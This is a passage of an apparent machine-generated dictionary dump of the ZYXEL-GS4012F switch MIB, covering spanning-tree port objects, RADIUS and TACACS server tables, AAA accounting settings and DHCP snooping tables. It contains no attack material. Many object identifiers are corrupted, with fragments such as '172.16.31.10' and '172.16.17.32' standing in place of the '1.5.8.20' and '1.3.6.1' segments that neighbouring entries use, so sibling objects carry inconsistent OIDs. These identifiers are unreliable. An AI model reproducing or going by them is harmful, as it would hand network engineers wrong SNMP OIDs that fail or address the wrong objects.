"status" : "current",
"syntax" : {
"type" : { "module" :"BRIDGE-MIB", "name" : "Timeout"},
},
"access" : "readonly",
"description" :
"""The maximum age of Spanning Tree Protocol
information learned from the network on any port
before it is discarded, in units of hundredths of
a second. This is the actual value that this
bridge is currently using.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.3.4""",
}, # column
"mrstpHelloTime" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.1.1.11",
"status" : "current",
"syntax" : {
"type" : { "module" :"BRIDGE-MIB", "name" : "Timeout"},
},
"access" : "readonly",
"description" :
"""The amount of time between the transmission of
Configuration bridge PDUs by this node on any port
when it is the root of the spanning tree or trying
to become so, in units of hundredths of a second.
This is the actual value that this bridge is
currently using.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.3.5""",
}, # column
"mrstpHoldTime" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.1.1.12",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""This time value determines the interval length
during which no more than two Configuration bridge
PDUs shall be transmitted by this node, in units
of hundredths of a second.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.3.14""",
}, # column
"mrstpForwardDelay" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.1.1.13",
"status" : "current",
"syntax" : {
"type" : { "module" :"BRIDGE-MIB", "name" : "Timeout"},
},
"access" : "readonly",
"description" :
"""This time value, measured in units of hundredths
of a second, controls how fast a port changes its
spanning state when moving towards the Forwarding
state. The value determines how long the port
stays in each of the Listening and Learning
states, which precede the Forwarding state. This
value is also used, when a topology change has
been detected and is underway, to age all dynamic
entries in the Forwarding Database. [Note that
this value is the one that this bridge is
currently using, in contrast to
mrstpBridgeForwardDelay which is the value that
this bridge and all others would start using
if/when this bridge were to become the root.]""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.3.6""",
}, # column
"mrstpBridgeMaxAge" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.1.1.14",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"parent module" : {
"name" : "BRIDGE-MIB",
"type" : "Timeout",
},
"ranges" : [
{
"min" : "600",
"max" : "4000"
},
],
"range" : {
"min" : "600",
"max" : "4000"
},
},
},
"access" : "readwrite",
"description" :
"""The value that all bridges use for MaxAge when
this bridge is acting as the root. Note that
802.1D-1990 specifies that the range for this
parameter is related to the value of
mrstpBridgeHelloTime. The granularity of this
timer is specified by 802.1D-1990 to be 1 second.
An agent may return a badValue error if a set is
attempted to a value which is not a whole number
of seconds.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.3.8""",
}, # column
"mrstpBridgeHelloTime" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.1.1.15",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"parent module" : {
"name" : "BRIDGE-MIB",
"type" : "Timeout",
},
"ranges" : [
{
"min" : "100",
"max" : "1000"
},
],
"range" : {
"min" : "100",
"max" : "1000"
},
},
},
"access" : "readwrite",
"description" :
"""The value that all bridges use for HelloTime when
this bridge is acting as the root. The
granularity of this timer is specified by 802.1D-
1990 to be 1 second. An agent may return a
badValue error if a set is attempted to a value
which is not a whole number of seconds.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.3.9""",
}, # column
"mrstpBridgeForwardDelay" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.1.1.16",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"parent module" : {
"name" : "BRIDGE-MIB",
"type" : "Timeout",
},
"ranges" : [
{
"min" : "400",
"max" : "3000"
},
],
"range" : {
"min" : "400",
"max" : "3000"
},
},
},
"access" : "readwrite",
"description" :
"""The value that all bridges use for ForwardDelay
when this bridge is acting as the root. Note that
802.1D-1990 specifies that the range for this
parameter is related to the value of
mrstpBridgeMaxAge. The granularity of this
timer is specified by 802.1D-1990 to be 1 second.
An agent may return a badValue error if a set is
attempted to a value which is not a whole number
of seconds.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.3.10""",
}, # column
"mrstpPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.2",
"status" : "current",
"description" :
"""A table that contains port-specific information
for the Spanning Tree Protocol.""",
}, # table
"mrstpPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.2.1",
"status" : "current",
"linkage" : [
"mrstpPort",
],
"description" :
"""A list of information maintained by every port
about the Spanning Tree Protocol state for that
port.""",
}, # row
"mrstpPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.2.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "65535"
},
],
"range" : {
"min" : "1",
"max" : "65535"
},
},
},
"access" : "readonly",
"description" :
"""The port number of the port for which this entry
contains Spanning Tree Protocol management
information.""",
"reference>" :
"""IEEE 802.1D-1990: Section 6.8.2.1.2""",
}, # column
"mrstpPortPriority" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.2.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "255"
},
],
"range" : {
"min" : "0",
"max" : "255"
},
},
},
"access" : "readwrite",
"description" :
"""The value of the priority field which is
contained in the first (in network byte order)
octet of the (2 octet long) Port ID. The other
octet of the Port ID is given by the value of
mrstpPort.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.5.1""",
}, # column
"mrstpPortState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.2.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"disabled" : {
"nodetype" : "namednumber",
"number" : "1"
},
"blocking" : {
"nodetype" : "namednumber",
"number" : "2"
},
"listening" : {
"nodetype" : "namednumber",
"number" : "3"
},
"learning" : {
"nodetype" : "namednumber",
"number" : "4"
},
"forwarding" : {
"nodetype" : "namednumber",
"number" : "5"
},
"broken" : {
"nodetype" : "namednumber",
"number" : "6"
},
},
},
"access" : "readonly",
"description" :
"""The port's current state as defined by
application of the Spanning Tree Protocol. This
state controls what action a port takes on
reception of a frame. If the bridge has detected
a port that is malfunctioning it will place that
port into the broken(6) state. For ports which
are disabled (see mrstpPortEnable), this object
will have a value of disabled(1).""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.5.2""",
}, # column
"mrstpPortEnable" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.2.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"enabled" : {
"nodetype" : "namednumber",
"number" : "1"
},
"disabled" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""The enabled/disabled status of the port.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.5.2""",
}, # column
"mrstpPortPathCost" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.2.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "65535"
},
],
"range" : {
"min" : "1",
"max" : "65535"
},
},
},
"access" : "readwrite",
"description" :
"""The contribution of this port to the path cost of
paths towards the spanning tree root which include
this port. 802.1D-1990 recommends that the
default value of this parameter be in inverse
proportion to the speed of the attached LAN.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.5.3""",
}, # column
"mrstpPortDesignatedRoot" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.2.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"BRIDGE-MIB", "name" : "BridgeId"},
},
"access" : "readonly",
"description" :
"""The unique Bridge Identifier of the Bridge
recorded as the Root in the Configuration BPDUs
transmitted by the Designated Bridge for the
segment to which the port is attached.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.5.4""",
}, # column
"mrstpPortDesignatedCost" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.2.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The path cost of the Designated Port of the
segment connected to this port. This value is
compared to the Root Path Cost field in received
bridge PDUs.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.5.5""",
}, # column
"mrstpPortDesignatedBridge" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.2.1.8",
"status" : "current",
"syntax" : {
"type" : { "module" :"BRIDGE-MIB", "name" : "BridgeId"},
},
"access" : "readonly",
"description" :
"""The Bridge Identifier of the bridge which this
port considers to be the Designated Bridge for
this port's segment.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.5.6""",
}, # column
"mrstpPortDesignatedPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.2.1.9",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "OctetString",
"ranges" : [
{
"min" : "2",
"max" : "2"
},
],
"range" : {
"min" : "2",
"max" : "2"
},
},
},
"access" : "readonly",
"description" :
"""The Port Identifier of the port on the Designated
Bridge for this port's segment.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.5.7""",
}, # column
"mrstpPortForwardTransitions" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.2.1.10",
"status" : "current",
"access" : "readonly",
"description" :
"""The number of times this port has transitioned
from the Learning state to the Forwarding state.""",
}, # column
"mrstpPortOnBridgeIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.2.1.11",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Indetify the bridge index that this port joined to in MRSTP.""",
}, # column
"mrstpNotifications" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.2",
}, # node
"radiusServerSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.43",
}, # node
"radiusAuthServerSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.43.1",
}, # node
"radiusAuthServerTimeout" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.43.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"radiusAuthServerTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.43.1.3",
"status" : "current",
"description" :
"""""",
}, # table
"radiusAuthServerEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.43.1.3.1",
"status" : "current",
"linkage" : [
"radiusAuthServerIndex",
],
"description" :
"""An entry in radiusAuthServerTable.""",
}, # row
"radiusAuthServerIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.43.1.3.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "noaccess",
"description" :
"""""",
}, # column
"radiusAuthServerIpAddr" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.43.1.3.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"radiusAuthServerUdpPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.43.1.3.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"radiusAuthServerSharedSecret" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.43.1.3.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"radiusAcctServerSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.43.2",
}, # node
"radiusAcctServerTimeout" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.43.2.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"radiusAcctServerTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.43.2.2",
"status" : "current",
"description" :
"""""",
}, # table
"radiusAcctServerEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.43.2.2.1",
"status" : "current",
"linkage" : [
"radiusAcctServerIndex",
],
"description" :
"""An entry in radiusAcctServerTable.""",
}, # row
"radiusAcctServerIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.43.2.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "noaccess",
"description" :
"""""",
}, # column
"radiusAcctServerIpAddr" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.43.2.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"radiusAcctServerUdpPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.43.2.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"radiusAcctServerSharedSecret" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.43.2.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"tacacsServerSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.44",
}, # node
"tacacsAuthServerSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.44.1",
}, # node
"tacacsAuthServerTimeout" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.44.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"tacacsAuthServerTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.44.1.3",
"status" : "current",
"description" :
"""""",
}, # table
"tacacsAuthServerEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.44.1.3.1",
"status" : "current",
"linkage" : [
"tacacsAuthServerIndex",
],
"description" :
"""An entry in tacacsAuthServerTable.""",
}, # row
"tacacsAuthServerIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.44.1.3.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "noaccess",
"description" :
"""""",
}, # column
"tacacsAuthServerIpAddr" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.44.1.3.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"tacacsAuthServerTcpPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.44.1.3.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"tacacsAuthServerSharedSecret" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.44.1.3.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"tacacsAcctServerSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.44.2",
}, # node
"tacacsAcctServerTimeout" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.44.2.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"tacacsAcctServerTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.44.2.2",
"status" : "current",
"description" :
"""""",
}, # table
"tacacsAcctServerEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.44.2.2.1",
"status" : "current",
"linkage" : [
"tacacsAcctServerIndex",
],
"description" :
"""An entry in tacacsAcctServerTable.""",
}, # row
"tacacsAcctServerIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.44.2.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "noaccess",
"description" :
"""""",
}, # column
"tacacsAcctServerIpAddr" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.44.2.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"tacacsAcctServerTcpPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.44.2.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"tacacsAcctServerSharedSecret" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.44.2.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"aaaSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.45",
}, # node
"authenticationSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.45.1",
}, # node
"authenticationTypeTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.45.1.1",
"status" : "current",
"description" :
"""""",
}, # table
"authenticationTypeEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.45.1.1.1",
"status" : "current",
"linkage" : [
"authenticationTypeName",
],
"description" :
"""An entry in authenticationTypeTable.""",
}, # row
"authenticationTypeName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.45.1.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"authenticationTypeMethodList" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.45.1.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "OctetString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"accountingSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.45.2",
}, # node
"accountingUpdatePeriod" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.45.2.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"accountingTypeTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.45.2.2",
"status" : "current",
"description" :
"""""",
}, # table
"accountingTypeEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.45.2.2.1",
"status" : "current",
"linkage" : [
"accountingTypeName",
],
"description" :
"""An entry in accountingTypeTable.""",
}, # row
"accountingTypeName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.45.2.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"accountingTypeActive" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.45.2.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"accountingTypeBroadcast" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.45.2.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"accountingTypeMode" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.45.2.2.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"start-stop" : {
"nodetype" : "namednumber",
"number" : "1"
},
"stop-only" : {
"nodetype" : "namednumber",
"number" : "2"
},
"not-available" : {
"nodetype" : "namednumber",
"number" : "255"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"accountingTypeMethod" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.45.2.2.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"radius" : {
"nodetype" : "namednumber",
"number" : "1"
},
"tacacs" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"accountingTypePrivilege" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.45.2.2.1.6",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"privilege-0" : {
"nodetype" : "namednumber",
"number" : "0"
},
"privilege-1" : {
"nodetype" : "namednumber",
"number" : "1"
},
"privilege-2" : {
"nodetype" : "namednumber",
"number" : "2"
},
"privilege-3" : {
"nodetype" : "namednumber",
"number" : "3"
},
"privilege-4" : {
"nodetype" : "namednumber",
"number" : "4"
},
"privilege-5" : {
"nodetype" : "namednumber",
"number" : "5"
},
"privilege-6" : {
"nodetype" : "namednumber",
"number" : "6"
},
"privilege-7" : {
"nodetype" : "namednumber",
"number" : "7"
},
"privilege-8" : {
"nodetype" : "namednumber",
"number" : "8"
},
"privilege-9" : {
"nodetype" : "namednumber",
"number" : "9"
},
"privilege-10" : {
"nodetype" : "namednumber",
"number" : "10"
},
"privilege-11" : {
"nodetype" : "namednumber",
"number" : "11"
},
"privilege-12" : {
"nodetype" : "namednumber",
"number" : "12"
},
"privilege-13" : {
"nodetype" : "namednumber",
"number" : "13"
},
"privilege-14" : {
"nodetype" : "namednumber",
"number" : "14"
},
"not-available" : {
"nodetype" : "namednumber",
"number" : "255"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpSnp" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.100",
}, # node
"dhcpSnpVlanTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.100.1",
"status" : "current",
"description" :
"""""",
}, # table
"dhcpSnpVlanEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.1.1",
"status" : "current",
"linkage" : [
"dhcpSnpVlanEntryVid",
],
"description" :
"""""",
}, # row
"dhcpSnpVlanEntryVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.1.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "4094"
},
],
"range" : {
"min" : "1",
"max" : "4094"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"dhcpSnpVlanEntryEnable" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpSnpVlanEntryOption82Enable" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpSnpVlanEntryInfo" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.1.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpSnpPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.100.2",
"status" : "current",
"description" :
"""""",
}, # table
"dhcpSnpPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.100.2.1",
"status" : "current",
"linkage" : [
"dhcpSnpPortEntryPort",
],
"description" :
"""""",
}, # row
"dhcpSnpPortEntryPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.100.2.1.1",
